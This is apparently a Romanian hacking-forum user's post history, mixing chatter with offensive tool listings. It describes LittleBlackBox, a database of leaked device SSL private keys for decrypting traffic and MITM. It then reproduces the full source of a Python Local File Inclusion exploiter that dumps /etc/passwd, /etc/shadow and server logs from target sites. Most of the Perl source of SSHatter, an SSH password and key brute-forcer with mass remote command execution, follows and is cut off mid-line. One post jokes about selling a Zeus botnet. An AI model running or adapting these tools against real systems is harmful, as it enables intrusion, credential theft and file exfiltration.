Jump to content

adi003user

Active Members
 View Profile  See their activity

  • Posts

    499

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Everything posted by adi003user

  1. adi003user
    it, scriptkids, know-how
  2. adi003user
    LittleBlackBox is a collection of thousands of private SSL keys extracted from various embedded devices. These private keys are stored in a database where they are correlated with their public SSL certificates as well as the hardware/firmware that are known to use those SSL keys. A command line utility is included to aid in the identification of devices or network traffic that use these known private keys. Given a public SSL certificate, the utility will search the database to see if it has a corresponding private key; if so, the private key is displayed and can be used for traffic decryption or MITM attacks. Alternatively, it will also display a table of hardware and firmware that is known to use that private key. The utility can obtain a public certificate several different ways: You may give it the path to a public certificate file. You may give it the SHA1 hash of a public certificate. Given a host, it will retrieve the host's public SSL certificate. Given a pcap file, it will parse the file looking for public certificate exchanges. Given a live network interface, it will listen for public certificate exchanges. http://code.google.com/p/littleblackbox/
  3. adi003user

    IT Security

    adi003user replied to pyth0n3's topic in Sugestii

    i like turtules si ideea lui python
  4. adi003user
    48 pers la munte. snowboard. envy me
  5. adi003user
    #!/usr/bin/python # Simple Local File Inclusion Exploiter, version 1.2 # by Valentin Hoebel (valentin@xenuser.org) # ASCII FOR BREAKFAST # ---------- [Description] # This tool helps you to exploit LFI (Local File Inclusion) vulnerabilities. # After you found a LFI vulnerability simply pass the affected URL # and vulnerable parameter to this tool. # You can also use this tool to scan a URL for LFI vulnerabilities. # ---------- [Features] # - This time with working random user agents # - Checks if a connection to the target can be established # - Some error handling # - Scans a parameter of a URL for a LFI vulnerability # - Finds out how a LFI vulnerability can be exploited (e.g. directory depth) # - Supports nullbytes # - Dumps a list of interesting files (e.g. /etc/passwd and logs) to the hard disk # - Supports common *nix targets, but no Windows systems. # - Creates a small log file. # Supports no SEO URLs, such as www.example.com/local-news/ # But in most cases it is possible to find out the real URL and pass it to this script. # ---------- [Usage example] # ./lfi_sploiter.py --exploit-url="http://www.example.com/page.php?url=main" --vulnerable-parameter="url" # The tool then assumes that the parameter "url" is vulnerable and attacks the target. # When you do not know which parameter is vulnerable simply try one parameter after another, # this tool will scan the parameter and tell you if it is vulnerable But only pass one parameter at once! # ---------- [Known issues] # - I know there is more about LFI than it is covered in this tool. But this is the first release, # and more features will be implemented in future versions. # - This tool is only able to handle "simple" LFI vulnerabilities, but not complex ones. # For example: Some LFI vulnerabilities consist of two URL parameters or require to # find a way around filters. In those cases, this tool unfortunately does not work. # - Like most other LFI exploiter / scanner, this tool here also has problems with # handling certain server responses. So this tool does not work with every website. # ---------- [Tested with] # Targets: Apache2 servers and PHP websites, various Linux systems # Script platform: Ubuntu Lucid Lynx and Python 2.6.5 # ---------- [Notes] # - This tool was developed using a Python 2.6.5 interpreter. # - I admit: This tool is a little bit slow and not very efficient (too many variables etc.). Sorry about that # - Modify, distribute, share and copy this code in any way you like! # - Please note that this tool was created and published for educational purposes only, e.g. for pentesting # your own website. Do not use it in an illegal way and always know + respect your local laws. # I am not responsible if you cause any damage with it. # ---------- [Changelog] # - Version 1.2 (05th December 2010): # - Added some more "interesting files" # # - Version 1.1 (23th November 2010): # - Added new log file <domain name>-details.txt which contains some information about the current scan # - Added some more "interesting files" # - Added some more user agents # # - Version 1.0 (21th November 2010): # - Initial release # Power to the cows! import getopt, sys, random, urllib, urllib2, httplib, re, string, os from urllib2 import Request, urlopen, URLError, HTTPError from urlparse import urlparse from time import gmtime, strftime def print_usage(): print_banner() print "[!] Wrong argument and parameters passed. Use --help and learn how to use this tool :)" print "[i] Hint: You need to pass a value for --exploit-url=\"<value>\" and --vulnerable-parameter=\"<value>\"." print "[i] Example: ./lfi_sploiter.py --exploit-url=\"http://www.example.com/page.php?file=main\" --vulnerable-parameter=\"file\" " print "" print "" sys.exit() return def print_help(): print_banner() print "((Displaying the content for --help.))" print "" print "[Description]" print "The Simple Local File Inclusion Exploiter helps you to" print "exploit LFI vulnerabilities. After you found one, simply" print "pass the URL of the affected website and the vulnerable" print "parameter to this tool. You can also use this tool" print "to scan a parameter of an ULR for a LFI vulnerability." print "" print "[Usage]" print "./lfi_sploiter.py --exploit-url=\"<URL with http://>\" --vulnerable-parameter=\"<parameter>\"" print "" print "[Usage example]" print "./lfi_sploiter.py --exploit-url=\"http://www.example.com/page.php?file=main\" --vulnerable-parameter=\"file\" " print "" print "[Usage notes]" print "- Always use http://...." print "- When you pass a vulnerable parameter, this tool assumes that it is really vulnerable." print "- If you do not know if a parameter is vulnerable, simply pass it to this script and let the scanner have a look." print "- Only use one vulnerable parameter at once." print "- This tool does not work with SEO URLs, such as http://www.example.com/news-about-the-internet/." print " If you only have a SEO URL, try to find out the real URL which contents parameters." print "" print "[Feature list]" print "- Provides a random user agent for the connection." print "- Checks if a connection to the target can be established." print "- Tries catch most errors with error handling. " print "- Contains a LFI scanner (only scans one parameter at once)." print "- Finds out how a LFI vulnerability can be exploited (e.g. directory depth)." print "- Supports nullbytes!" print "- Exploit features: Dumps a list of interesting files to your hard disk." print "- Supports common *nix targets, but no Windows systems." print "- Creates a small log file." print "" print "[Some notes]" print "- Tested with Python 2.6.5." print "- Modify, distribute, share and copy the code in any way you like!" print "- Please note that this tool was created for educational purposes only." print "- Do not use this tool in an illegal way. Know and respect your local laws." print "- Only use this tool for legal purposes, such as pentesting your own website :)" print "- I am not responsible if you cause any damage or break the law." print "- Power to teh c0ws!" print "" print "" sys.exit() return def print_banner(): print "" print "" print "" print "Simple Local File Inclusion Exploiter" print "by Valentin Hoebel (valentin@xenuser.org)" print "" print "Version 1.2 (05th December 2010) ^__^" print " (oo)\________" print " (__)\ )\/\ " print " ||----w |" print "Power to teh cows! || ||" print "____________________________________________________" print "" return def test_url(exploit_url): print "" print "[i] Assuming the provided data was correct." print "[i] Trying to establish a connection with a random user agent..." user_agents = [ "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.9)", "Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01 ", "Opera/8.00 (Windows NT 5.1; U; en)", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19 " ] user_agent = random.choice (user_agents) check="" request_website = urllib2.Request(exploit_url) request_website.add_header('User-Agent', user_agent) try: check = urllib2.urlopen(request_website) except HTTPError, e: print "[!] The connection could not be established." print "[!] Error code: ", e print "[!] Exiting now!" print "" print "" sys.exit(1) except URLError, e: print "[!] The connection could not be established." print "[!] Reason: ", e print "[!] Exiting now!" print "" print "" sys.exit(1) else: print "[i] Connected to target! URL seems to be valid." print "[i] Jumping to the exploit feature." return def exploit_lfi(exploit_url, vulnerable_parameter): print "" # Define all variables of this function # I know, there are more efficient ways of handling all the "problems" we encounter later in this script, # but well, I am still learning lfi_found = 0 param_equals = "=" param_sign_1 = "?" param_sign_2 = "&" nullbyte = "%00" one_step_deeper = "../" for_the_first_test = "/" for_changing_the_dump_file_name = "_" for_the_second_test = ".." max_depth = 20 i = 0 nullbyte_required = 1 depth = 0 original_vulnerable_parameter_value = "" query_string = "" modified_query_string = "" lfi_url_part_one = "" lfi_url_part_two = "" lfi_url_part_three = "" lfi_url_part_four = "" lfi_url = "" find_nasty_string = "root:x:0:0:" find_nasty_string_2 = "mail:x:8:" user_agents = [ "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8", "Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6)", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en)", "Mozilla/3.01 (Macintosh; PPC)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.9)", "Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01", "Opera/8.00 (Windows NT 5.1; U; en)", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19" ] user_agent = random.choice (user_agents) lfi_response="" lfi_response_source_code = "" replace_string = "" replace_string_2 = "" replace_me = "" value_for_vulnerable_parameter = "" value_for_vulnerable_parameter_2 = "" exploit_depth= 0 folder_name = "" cd_into = "" change_dump_filename = "" log_file_name = "" # I know, some of these are rarely accessible for the webserver, but you never know... it is worth the try! # Never ever change the first line! local_files = [ "etc/passwd", "proc/self/environ", "var/log/apache2/access.log", "var/log/apache2/access_log", "var/log/apache2/error.log", "var/log/apache2/error_log", "var/log/httpd/access.log", "var/log/httpd/access_log", "var/log/httpd/error.log", "var/log/httpd/error_log", "var/log/nginx/access.log", "var/log/nginx/access_log", "var/log/nginx/error.log", "var/log/nginx/error_log", "etc/shadow", "etc/group", "var/log/auth.log", "proc/self/status", "proc/self/mounts", "proc/cpuinfo", "proc/meminfo", "etc/apache2/httpd.conf", "etc/apache2/apache2.conf", "etc/apache2/envvars" ] # We have to split up the URL in order to replace the value of the vulnerable parameter get_parsed_url = urlparse(exploit_url) print "[i] For exploiting the LFI vulnerability we need to split the URL into its parts." print "[i] IP address / domain: " + get_parsed_url.netloc if len(get_parsed_url.path) == 0: print "[!] The URL doesn't contain a script (e.g. target/index.php)." else: print "[i] Script:", get_parsed_url.path if len(get_parsed_url.query) == 0: print "[!] The URL doesn't contain a query string (e.g. index.php?var1=x&controller=main)." else: print "[i] URL query string:", get_parsed_url.query print "" # Finding all URL parameters if param_sign_1 in exploit_url and param_equals in exploit_url: print "[i] It seems that the URL contains at least one parameter." print "[i] Trying to find also other parameters..." # It seems that there is at least one parameter in the URL. Trying to find out if there are also others... if param_sign_2 in get_parsed_url.query and param_equals in get_parsed_url.query: print "[i] Also found at least one other parameter in the URL." else: print "[i] No other parameters were found." else: print "" print "[!] It seems that there is no parameter in the URL." print "[!] How am I supposed to find a vulnerability?" print "[!] Please provide an URL with a script and query string." print "[!] Example: target/index.php?cat=1&article_id=2&controller=main" print "[!] Hint: I can't handle SEO links, so try to find an URL with a query string." print "[!] This can most likely be done by having a look at the source code (rightclick -> show source code in your browser)." print "[!] Exiting now!" print "" print "" sys.exit(1) # Detect the parameters # Thanks to atomized.org for the URL splitting and parameters parsing part! parameters = dict([part.split('=') for part in get_parsed_url[4].split('&')]) # Count the parameters parameters_count = len(parameters) # Print the parameters and store them in single variables print "[i] The following", parameters_count, "parameter(s) was/were found:" print "[i]", parameters # Check if the URL contains the provided vulnerable parameter print "" print "[i] According to you, the vulnerable parameter should be: " + vulnerable_parameter print "[i] Checking if this parameter exists in the provided URL..." if vulnerable_parameter in get_parsed_url.query: print "[i] Found your vulnerable parameter in the URL." else: print "[!] I was not able to find your vulnerable parameter within the provided URL." print "[!] How am I supposed to exploit the LFI vulnerabililty then?" print "[!] Exiting now!" print "" print "" sys.exit(1) # We now try to find out how this LFI vulnerability can be exploited # a) How deep do we need to go (../../......) and do we need to use the nullbyte? =) # We find this out by trying to access the /etc/passwd file.. it should always be accessible. print "" print "[i] Now trying to find out how this LFI vulnerability can be exploited..." print "[i] This can take a while." value_for_vulnerable_parameter = for_the_first_test value_for_vulnerable_parameter += value_for_vulnerable_parameter.join(local_files[0:1]) value_for_vulnerable_parameter_2 = "".join(local_files[0:1]) value_for_vulnerable_parameter_with_nullbyte = value_for_vulnerable_parameter + nullbyte value_for_vulnerable_parameter_with_nullbyte_2 = value_for_vulnerable_parameter_2 + nullbyte query_string = get_parsed_url.query # Find out what value the vulnerable parameter currently has for key, value in parameters.items(): if key == vulnerable_parameter: # Save the value of the vulnerable parameter, so we later can search in in the URL original_vulnerable_parameter_value = value # Our main routine, maybe the most important part of this script # At first without the nullbyte for depth in range(i, max_depth): # Replace the default value of the vulnerable parameter with our LFI string replace_string = (depth * one_step_deeper) + value_for_vulnerable_parameter_2 replace_string_2 = vulnerable_parameter + param_equals + (depth * one_step_deeper) + value_for_vulnerable_parameter_2 if depth== 0: replace_string = (depth * one_step_deeper) + value_for_vulnerable_parameter replace_string_2 = vulnerable_parameter + param_equals + (depth * one_step_deeper) + value_for_vulnerable_parameter replace_me = vulnerable_parameter + param_equals + original_vulnerable_parameter_value modified_query_string = query_string.replace(replace_me, replace_string_2) # Now craft the URL lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://" lfi_url_part_two = "".join(get_parsed_url[1:2]) lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?" lfi_url_part_four = "".join(modified_query_string) lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four # Ok, everything is prepared to enter subspace.. eeh, to call the URL (Stargate fans get this joke!) request_website = urllib2.Request(lfi_url) request_website.add_header('User-Agent', user_agent) try: lfi_response = urllib2.urlopen(request_website) except URLError, e: print "[!] The connection could not be established." print "[!] Reason: ", e else: lfi_response_source_code = lfi_response.read() if find_nasty_string in lfi_response_source_code: print "[+] Found signs of a successfull LFI vulnerability! No nullbyte was required." print "[+] URL: " + lfi_url nullbyte_required = 0 lfi_found = 1 exploit_depth = depth break else: if find_nasty_string_2 in lfi_response_source_code: print "[+] Found signs of a successfull LFI vulnerability! No nullbyte was required." print "[+] URL: " + lfi_url nullbyte_required = 0 lfi_found = 1 exploit_depth = depth break if nullbyte_required == 1: # Now with the nullbyte for depth in range(i, max_depth): # Replace the default value of the vulnerable parameter with our LFI string replace_string = (depth * one_step_deeper) + value_for_vulnerable_parameter_with_nullbyte_2 replace_string_2 = vulnerable_parameter + param_equals + (depth * one_step_deeper) + value_for_vulnerable_parameter_with_nullbyte_2 if depth== 0: replace_string = (depth * one_step_deeper) + value_for_vulnerable_parameter_with_nullbyte replace_string_2 = vulnerable_parameter + param_equals + (depth * one_step_deeper) + value_for_vulnerable_parameter_with_nullbyte replace_me = vulnerable_parameter + param_equals + original_vulnerable_parameter_value modified_query_string = query_string.replace(replace_me, replace_string_2) # Now craft the URL lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://" lfi_url_part_two = "".join(get_parsed_url[1:2]) lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?" lfi_url_part_four = "".join(modified_query_string) lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four # Ok, everything is prepared to enter subspace.. eeh, to call the URL (Stargate fans get this joke!) request_website = urllib2.Request(lfi_url) request_website.add_header('User-Agent', user_agent) try: lfi_response = urllib2.urlopen(request_website) except URLError, e: print "[!] The connection could not be established." print "[!] Reason: ", e else: lfi_response_source_code = lfi_response.read() if find_nasty_string in lfi_response_source_code: print "[+] Found signs of a successfull LFI vulnerability! Using the nullbyte was necessary." print "[+] URL: " + lfi_url lfi_found = 1 exploit_depth = depth break else: if find_nasty_string_2 in lfi_response_source_code: print "[+] Found signs of a successfull LFI vulnerability! Using the nullbyte was necessary." print "[+] URL: " + lfi_url lfi_found = 1 exploit_depth = depth break if lfi_found == 0: print "[!] The LFI vulnerability could not be detected." print "[!] Exiting now!" print "" print "" sys.exit() # Now that we know the details of the LFI vulnerability, we can start to exploit it. # At first we try to dump all interesting files to your local hard disk print "" print "[i] Exploiting the LFI vulnerability starts right now." print "[i] Trying to dump some interesting files to your local hard disk..." # "Craft" the folder name, it contains the scanned website and a formatted timestamp folder_name = get_parsed_url.netloc + "_-_" + strftime("%d_%b_%Y_%H:%M:%S_+0000", gmtime()) # Create the folder, with some error handling try: os.mkdir(folder_name) except OSError: print "[!] Something is wrong, the folder could not be created. Check the chmod and chown permissions!" print "[!] Exiting now!" print "" print "" sys.exit(1) cd_into = os.getcwd() + "/" + folder_name + "/" os.chdir(cd_into) # New since version 1.1: Create a small log file log_file_name = folder_name + "_-_scan.log" FILE = open(log_file_name, "w") FILE.write("Simple Local File Inclusion Exploiter - Log File\n") FILE.write("----------------------------------------------------------\n\n") FILE.write("Exploited URL:\n") FILE.write(exploit_url + "\n\n") FILE.write("LFI URL:\n") FILE.write(lfi_url) FILE.close # Start "calling" the files. Yeeeha! for key, file in enumerate(local_files): # Craft the URL # Consider nullbyte usage... if nullbyte_required == 0: # Consider that the LFI can be exploited by the first try and that no "cd .."s are needed. # Yes, sometimes this works! For example in my test script So this code block has a right to exist, believe it or not =) replace_string = (exploit_depth * one_step_deeper) + file replace_string_2 = vulnerable_parameter + param_equals + (exploit_depth * one_step_deeper) + file if exploit_depth == 0: replace_string = (exploit_depth * one_step_deeper) + for_the_first_test + file replace_string_2 = vulnerable_parameter + param_equals + (exploit_depth * one_step_deeper) + for_the_first_test + file replace_me = vulnerable_parameter + param_equals + original_vulnerable_parameter_value modified_query_string = query_string.replace(replace_me, replace_string_2) lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://" lfi_url_part_two = "".join(get_parsed_url[1:2]) lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?" lfi_url_part_four = "".join(modified_query_string) lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four request_website = urllib2.Request(lfi_url) request_website.add_header('User-Agent', user_agent) try: lfi_response = urllib2.urlopen(request_website) except URLError, e: print "[!] The connection could not be established." print "[!] Reason: ", e else: lfi_response_source_code = lfi_response.read() # Dump the file # We need to replace the "/" with underscores change_dump_filename = file.replace(for_the_first_test, for_changing_the_dump_file_name) print "[+] Dumping file: " + for_the_first_test + file FILE = open(change_dump_filename, "w") FILE.write(lfi_response_source_code ) FILE.close elif nullbyte_required == 1: # Consider that the LFI can be exploited by the first try and that no "cd .."s are needed. # Yes, sometimes this works! For example in my test script So this code block has a right to exist, believe it or not =) replace_string = (exploit_depth * one_step_deeper) + file + nullbyte replace_string_2 = vulnerable_parameter + param_equals + (exploit_depth * one_step_deeper) + file + nullbyte if exploit_depth == 0: replace_string = (exploit_depth * one_step_deeper) + for_the_first_test + file + nullbyte replace_string_2 = vulnerable_parameter + param_equals + (exploit_depth * one_step_deeper) + for_the_first_test + file + nullbyte replace_me = vulnerable_parameter + param_equals + original_vulnerable_parameter_value modified_query_string = query_string.replace(replace_me, replace_string_2) lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://" lfi_url_part_two = "".join(get_parsed_url[1:2]) lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?" lfi_url_part_four = "".join(modified_query_string) lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four request_website = urllib2.Request(lfi_url) request_website.add_header('User-Agent', user_agent) try: lfi_response = urllib2.urlopen(request_website) except URLError, e: print "[!] The connection could not be established." print "[!] Reason: ", e else: lfi_response_source_code = lfi_response.read() # Dump the file # We need to replace the "/" with underscores change_dump_filename = file.replace(for_the_first_test, for_changing_the_dump_file_name) print "[+] Dumping file: " + for_the_first_test + file FILE = open(change_dump_filename, "w") FILE.write(lfi_response_source_code ) FILE.close print "[i] Hint: The files are also dumped when we have no permission to view them." print "[i] Instead of the file, the PHP error message will be dumped." print "" print "[i] Completed the task. Will now exit!" print "[i] A small log file was created." print "[i] I know, there is more about LFI than it is covered here, but this will be implemented in later versions of this tool." print "[i] Feel free to send in some feedback!" print "" print"" sys.exit(1) return def main(argv): exploit_url="" vulnerable_parameter="" try: opts, args = getopt.getopt(sys.argv[1:], "", ["help", "exploit-url=", "vulnerable-parameter="]) except getopt.GetoptError : print_usage() sys.exit(2) for opt, arg in opts: if opt in ("--help"): print_help() break sys.exit(1) elif opt in ("--exploit-url") : exploit_url=arg elif opt in ("--vulnerable-parameter"): vulnerable_parameter=arg if len(exploit_url) < 1: print_usage() sys.exit() if len(vulnerable_parameter) < 1: print_usage() sys.exit() # Continue if all required arguments were passed to the script. print_banner() print "[i] Provided URL to exploit: " + exploit_url print "[i] Provided vulnerable parameter: " + vulnerable_parameter # Check if URL is test_url(exploit_url) # Calling the LFI exploit function exploit_lfi(exploit_url, vulnerable_parameter) if __name__ == "__main__": main(sys.argv[1:]) ### EOF ### Cum? ./lfi_sploiter.py –exploit-url= –vulnerable-parameter= ./lfi_sploiter.py –exploit-url=http://www.site.com/page.php?file=main –v
  6. adi003user
    interesanta idee. de ce se duce un cc si catre adresa ta?
  7. adi003user
    cred ca rst trebuie sa devina pe baza de invitatie si/sau pe baza de interviu. sincer
  8. adi003user
    1. nu imi place ca e wide cand nu exista sau nu e pusa cum trebuie informatie sa ocupe spatiul ala 2. nu imi place logo. e antic si cred ca e furat din office 97
  9. adi003user
    are dreptate copchilu. incearca urmatoarea chestie. http://www.nasa.gov/hiddenadminpanel(supersecret) o sa afiseze page not found. dar asta doar fiindca e super secreta pagina ii dai view source. ii dai copy paste la cod in delphi 6 (neaparat 6). dai build. (iti apar niste erori dar merge) rulezi scriptul pe o masina virtuala virtuala (adica virtuala de doua ori) cu urmatoarea comanda sudo perl install ./nume_script - ip nasa - ip-ul tau ti se deschide o pagina cu datele de logare de pe nasa si un link unde te poti loga. simplu daca nu te descuri trimite 50 euro pe paypal si dau bonus pe langa datele de logare reteaua mea de boti (zeus) pe care o tin in pivnita
  10. adi003user
    Nici nu stiam de SHA-3, dar banuiesc ca doar 5% din membrii sunt interesati de lucrurile asta.... 10x de info am o intebare.. poate stupida. o sa fie folosit in ssh?
  11. adi003user
    #!/usr/bin/perl -w # $Header: /var/lib/cvsd/var/lib/cvsd/SSHatter/src/SSHatter.pl,v 1.12 2009-12-10 01:25:47 timb Exp $ # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # * Neither the name of the Nth Dimension nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # (c) Tim Brown, 2009 # <mailto:timb@nth-dimension.org.uk> # <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> use strict; package SSHatter::SSH::Host; use Net::SSH::Perl; sub new { my $class; my $self; $class = shift; $self = {}; bless($self, $class); $self->{'hostname'} = shift; $self->{'portnumber'} = shift; return $self; } sub info { my $self; $self = shift; return $self->{'hostname'} . ":" . $self->{'portnumber'}; } sub pipe { my $self; $self = shift; pipe($self->{'readhandle'}, $self->{'writehandle'}); } sub checkbykey { my $self; my $username; my $key; my $sshhandle; $self = shift; $username = shift; $key = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$key], options => ["PasswordAuthentication no"]); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { $sshhandle->login($username); $sshhandle->cmd("echo SSHatter"); }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return 0; } } } return 1; } sub checkbypassword { my $self; my $username; my $password; my $sshhandle; $self = shift; $username = shift; $password = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { $sshhandle->login($username, $password); $sshhandle->cmd("echo SSHatter"); }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return 0; } } } return 1; } sub writehandle { my $self; $self = shift; return $self->{'writehandle'}; } sub readhandle { my $self; $self = shift; return $self->{'readhandle'}; } sub unpipe { my $self; $self = shift; close($self->{'writehandle'}); } sub addkey { my $self; my $username; my $key; $self = shift; $username = shift; $key = shift; $self->{'keys'}{$username} = $key; } sub addpassword { my $self; my $username; my $password; $self = shift; $username = shift; $password = shift; $self->{'passwords'}{$username} = $password; } sub usernamesbykey { my $self; $self = shift; return keys(%{$self->{'keys'}}); } sub usernamesbypassword { my $self; $self = shift; return keys(%{$self->{'passwords'}}); } sub key { my $self; my $username; $self = shift; $username = shift; return $self->{'keys'}{$username}; } sub password { my $self; my $username; $self = shift; $username = shift; return $self->{'passwords'}{$username}; } sub executebykey { my $self; my $username; my $commandstring; my $sshhandle; my @resultstrings; $self = shift; $username = shift; $commandstring = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$self->{'keys'}{$username}], options => ["PasswordAuthentication no"]); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { print "[" . $username . ":" . $self->{'keys'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n"; $sshhandle->login($username); @resultstrings = $sshhandle->cmd($commandstring); }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return ("", "", -42); } } } return @resultstrings; } sub executebypassword { my $self; my $username; my $sudoflag; my $commandstring; my $sshhandle; my @resultstrings; $self = shift; $username = shift; $sudoflag = shift; $commandstring = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { $sshhandle->login($username, $self->{'passwords'}{$username}); print "[" . $username . ":" . $self->{'passwords'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n"; if (defined($sudoflag)) { @resultstrings = $sshhandle->cmd($commandstring, $self->{'passwords'}{$username} . "\n"); } else { @resultstrings = $sshhandle->cmd($commandstring); } }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return ("", "", -42); } } } return @resultstrings; } package SSHatter; use File::Basename; use Getopt::Std; use Parallel::ForkManager; my %argumentslist; my $maximumprocess; my $targetserverfilename; my $usernamefilename; my $keydirectoryname; my $passwordfilename; my $dumbflag; my $sudoflag; my $safeflag; my $masscommand; my $interactiveflag; my $localfilename; my $remotefilename; my $targetserverhandle; my $targetserverstring; my $hostname; my $portnumber; my $forkmanager; my $targetserver; my $processid; my $writehandle; my $usernamehandle; my $usernamestring; my $keyfilename; my $passwordhandle; my $passwordstring; my @targetservers; my $username; my $confirmresponse; my @resultstrings; my $nextcommand; my $localfilehandle; my $localfilebyte; my $localfiledata; sub parsetarget { my $targetserverstring; my $hostname; my $portnumber; $targetserverstring = shift; $targetserverstring =~ s/\x0a//g; ($hostname, $portnumber) = split(/:/, $targetserverstring); if ($portnumber && ($portnumber =~ /([0-9]+)/)) { $portnumber = $1; if (($portnumber <= 0) || ($portnumber > 65535)) { $portnumber = 22; } } else { $portnumber = 22; } return ($hostname, $portnumber); } sub main::HELP_MESSAGE { die "usage: " . basename($0) . " -x <maximumprocess> -t <targetserverfilename> -u <usernamefilename> <[-k <keydirectoryname>] [-p <passwordfilename>] [-d]> [[-0] [-s] -m <masscommand> | [-0] [-s] -i | -P <localfilename> | -G <remotefilename>] -d - dumb mode, try username equals password, username, blank -0 - sudo mode, echo the password to STDIN (useful for systems where sudo -S works) -s - safe mode, prompt before executing -m - mass mode, run one command across all targets -i - interactive mode, run multiple commands across all targets (non-persistant) -P - upload a file -G - download a file If sudo mode is not enabled, then " . $0 . " will block on STDIN."; } sub main::VERSION_MESSAGE { print basename($0) . " 1.0\n"; } $Getopt::Std::STANDARD_HELP_VERSION = 1; getopts("x:t:u:k:p:d0sm:iP:G:", \%argumentslist); if (defined($argumentslist{'x'}) && ($argumentslist{'x'} =~ /([0-9]+)/)) { $maximumprocess = $1; } else { Getopt::Std::help_mess("", "main"); } if (defined($argumentslist{'t'}) && (-e $argumentslist{'t'})) { $targetserverfilename = $argumentslist{'t'}; } else { Getopt::Std::help_mess("", "main"); } if (defined($argumentslist{'u'}) && (-e $argumentslist{'u'})) { $usernamefilename = $argumentslist{'u'}; } else { Getopt::Std::help_mess("", "main"); } if (defined($argumentslist{'k'}) && (-e $argumentslist{'k'})) { $keydirectoryname = $argumentslist{'k'}; } if (defined($argumentslist{'p'}) && (-e $argumentslist{'p'})) { $passwordfilename = $argumentslist{'p'}; } if (defined($argumentslist{'d'})) { $dumbflag = 1; } if (!defined($keydirectoryname) && !defined($passwordfilename) && !defined($dumbflag)) { Getopt::Std::help_mess("", "main"); } if (defined($argumentslist{'0'})) { $sudoflag = 1; } if (defined($argumentslist{'s'})) { $safeflag = 1; } if (defined($argumentslist{'m'})) { $masscommand = $argumentslist{'m'}; } else { if (defined($argumentslist{'i'})) { $interactiveflag = 1; } else { if (defined($argumentslist{'P'})) { if (-e $argumentslist{'P'}) { $localfilename = $argumentslist{'P'}; } else { Getopt::Std::help_mess("", "main"); } } else { if (defined($argumentslist{'G'})) { $remotefilename = $argumentslist{'G'}; } } } } $forkmanager = 